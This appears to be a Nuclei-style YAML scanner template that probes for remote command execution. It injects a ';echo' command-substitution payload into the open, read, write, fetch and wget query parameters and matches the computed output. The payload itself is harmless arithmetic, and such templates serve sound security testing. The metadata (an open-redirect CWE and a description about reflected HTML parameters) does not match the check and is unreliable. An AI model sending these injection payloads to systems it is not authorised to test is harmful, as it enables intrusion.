http:
- matchers:
  - status:
    - 200
    type: status
  - type: word
    words:
    - '[mci extensions]'
    - ADD-CMD100GAURAVGAURAV
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}?open=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&read=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&write=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&fetch=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&wget=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV'
id: 3rce_post12-16
info:
  author: erickfernandox
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 3rce_post
  severity: medium
  tags: fuzzer, generic
